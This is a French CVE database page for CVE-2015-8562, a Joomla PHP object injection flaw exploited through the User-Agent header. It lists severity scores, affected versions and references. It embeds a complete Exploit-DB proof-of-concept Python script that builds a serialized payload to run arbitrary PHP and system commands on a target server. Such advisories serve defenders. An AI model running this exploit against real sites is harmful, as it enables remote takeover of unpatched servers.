CVE-2015-8562 : Détail

CVE-2015-8562

A03-Injection
96.65%V3
Network
2015-12-16
20h00 +00:00
2018-10-09
16h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 38977

Date de publication : 2015-12-14 23h00 +00:00
Auteur : Sec-1
EDB Vérifié : Yes

''' Simple PoC for Joomla Object Injection. Gary @ Sec-1 ltd http://www.sec-1.com/ ''' import requests # easy_install requests def get_url(url, user_agent): headers = { 'User-Agent': user_agent } cookies = requests.get(url,headers=headers).cookies for _ in range(3): response = requests.get(url, headers=headers,cookies=cookies) return response def php_str_noquotes(data): "Convert string to chr(xx).chr(xx) for use in php" encoded = "" for char in data: encoded += "chr({0}).".format(ord(char)) return encoded[:-1] def generate_payload(php_payload): php_payload = "eval({0})".format(php_str_noquotes(php_payload)) terminate = '\xf0\xfd\xfd\xfd'; exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' injected_payload = "{};JFactory::getConfig();exit".format(php_payload) exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate return exploit_template pl = generate_payload("system('touch /tmp/fx');") print get_url("http://172.31.6.242/", pl)

Products Mentioned

Configuraton 0

Joomla>>Joomla\! >> Version 1.5.0

Joomla>>Joomla\! >> Version 1.5.1

Joomla>>Joomla\! >> Version 1.5.2

Joomla>>Joomla\! >> Version 1.5.3

Joomla>>Joomla\! >> Version 1.5.4

Joomla>>Joomla\! >> Version 1.5.6

Joomla>>Joomla\! >> Version 1.5.7

Joomla>>Joomla\! >> Version 1.5.8

Joomla>>Joomla\! >> Version 1.5.9

Joomla>>Joomla\! >> Version 1.5.10

Joomla>>Joomla\! >> Version 1.5.11

Joomla>>Joomla\! >> Version 1.5.12

Joomla>>Joomla\! >> Version 1.5.13

Joomla>>Joomla\! >> Version 1.5.14

Joomla>>Joomla\! >> Version 1.5.15

Joomla>>Joomla\! >> Version 1.5.16

Joomla>>Joomla\! >> Version 1.5.17

Joomla>>Joomla\! >> Version 1.5.18

Joomla>>Joomla\! >> Version 1.5.19

Joomla>>Joomla\! >> Version 1.5.20

Joomla>>Joomla\! >> Version 1.5.21

Joomla>>Joomla\! >> Version 1.5.22

Joomla>>Joomla\! >> Version 1.5.23

Joomla>>Joomla\! >> Version 1.5.24

Joomla>>Joomla\! >> Version 1.5.25

Joomla>>Joomla\! >> Version 1.5.26

Joomla>>Joomla\! >> Version 1.6.0

Joomla>>Joomla\! >> Version 1.6.1

Joomla>>Joomla\! >> Version 1.6.2

Joomla>>Joomla\! >> Version 1.6.3

Joomla>>Joomla\! >> Version 1.6.4

Joomla>>Joomla\! >> Version 1.6.5

Joomla>>Joomla\! >> Version 1.6.6

Joomla>>Joomla\! >> Version 1.7.0

Joomla>>Joomla\! >> Version 1.7.1

Joomla>>Joomla\! >> Version 1.7.2

Joomla>>Joomla\! >> Version 1.7.3

Joomla>>Joomla\! >> Version 1.7.4

Joomla>>Joomla\! >> Version 1.7.5

Joomla>>Joomla\! >> Version 2.5.0

Joomla>>Joomla\! >> Version 2.5.1

Joomla>>Joomla\! >> Version 2.5.2

Joomla>>Joomla\! >> Version 2.5.3

Joomla>>Joomla\! >> Version 2.5.4

Joomla>>Joomla\! >> Version 2.5.5

Joomla>>Joomla\! >> Version 2.5.6

Joomla>>Joomla\! >> Version 2.5.7

Joomla>>Joomla\! >> Version 2.5.8

Joomla>>Joomla\! >> Version 2.5.9

Joomla>>Joomla\! >> Version 2.5.10

Joomla>>Joomla\! >> Version 2.5.11

Joomla>>Joomla\! >> Version 2.5.12

Joomla>>Joomla\! >> Version 2.5.13

Joomla>>Joomla\! >> Version 2.5.14

Joomla>>Joomla\! >> Version 2.5.15

Joomla>>Joomla\! >> Version 2.5.16

Joomla>>Joomla\! >> Version 2.5.17

Joomla>>Joomla\! >> Version 2.5.18

Joomla>>Joomla\! >> Version 2.5.19

Joomla>>Joomla\! >> Version 2.5.20

Joomla>>Joomla\! >> Version 2.5.21

Joomla>>Joomla\! >> Version 2.5.22

Joomla>>Joomla\! >> Version 2.5.23

Joomla>>Joomla\! >> Version 2.5.24

Joomla>>Joomla\! >> Version 2.5.25

Joomla>>Joomla\! >> Version 2.5.26

Joomla>>Joomla\! >> Version 2.5.27

Joomla>>Joomla\! >> Version 2.5.28

Joomla>>Joomla\! >> Version 3.0.0

Joomla>>Joomla\! >> Version 3.0.1

Joomla>>Joomla\! >> Version 3.0.2

Joomla>>Joomla\! >> Version 3.0.3

Joomla>>Joomla\! >> Version 3.1.0

Joomla>>Joomla\! >> Version 3.1.1

Joomla>>Joomla\! >> Version 3.1.2

Joomla>>Joomla\! >> Version 3.1.3

Joomla>>Joomla\! >> Version 3.1.4

Joomla>>Joomla\! >> Version 3.1.5

Joomla>>Joomla\! >> Version 3.1.6

Joomla>>Joomla\! >> Version 3.2.0

Joomla>>Joomla\! >> Version 3.2.1

Joomla>>Joomla\! >> Version 3.2.2

Joomla>>Joomla\! >> Version 3.2.3

Joomla>>Joomla\! >> Version 3.2.4

Joomla>>Joomla\! >> Version 3.3.0

Joomla>>Joomla\! >> Version 3.3.1

Joomla>>Joomla\! >> Version 3.3.2

Joomla>>Joomla\! >> Version 3.3.3

Joomla>>Joomla\! >> Version 3.3.4

Joomla>>Joomla\! >> Version 3.4.0

Joomla>>Joomla\! >> Version 3.4.1

Joomla>>Joomla\! >> Version 3.4.2

Joomla>>Joomla\! >> Version 3.4.3

Joomla>>Joomla\! >> Version 3.4.4

Joomla>>Joomla\! >> Version 3.4.5

Références

https://www.exploit-db.com/exploits/39033/
Tags : exploit, x_refsource_EXPLOIT-DB
https://www.exploit-db.com/exploits/38977/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/79195
Tags : vdb-entry, x_refsource_BID